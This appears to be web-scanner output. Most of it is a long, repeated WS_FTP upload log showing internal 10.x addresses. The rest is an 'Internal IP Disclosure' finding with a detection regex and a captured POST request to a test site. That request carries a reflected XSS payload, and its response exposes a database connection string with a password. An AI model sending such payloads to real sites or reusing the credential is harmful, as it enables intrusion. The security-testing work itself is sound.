10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
Internal IP DisclosureA string matching an internal IP address was discovered. This discloses information about the IP addressing scheme of the internal network and can be valuable to attackers.
<p>Internal IP ranges are:<BR>10.x.x.x<BR>172.x.x.x<BR>192.168.x.x<BR><BR><BR>Note: This problem can appear multiple times on technical documentation pages. This should be determined in order to assess that the vulnerability is real.GET <var name="path"/> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
[^\d]10\.\d\d?\d?\.\d\d?\d?\.\d\d?\d?[^\d] |[^\d](172\.[123]\d\.\d\d?\d?\.\d\d?\d?)[^\d] |[^\d](192\.168\.\d\d?\d?\.\d\d?\d?)[^\d]POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 170
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=</textarea><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 418
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = </textarea><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "txtHidden" = </textarea><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
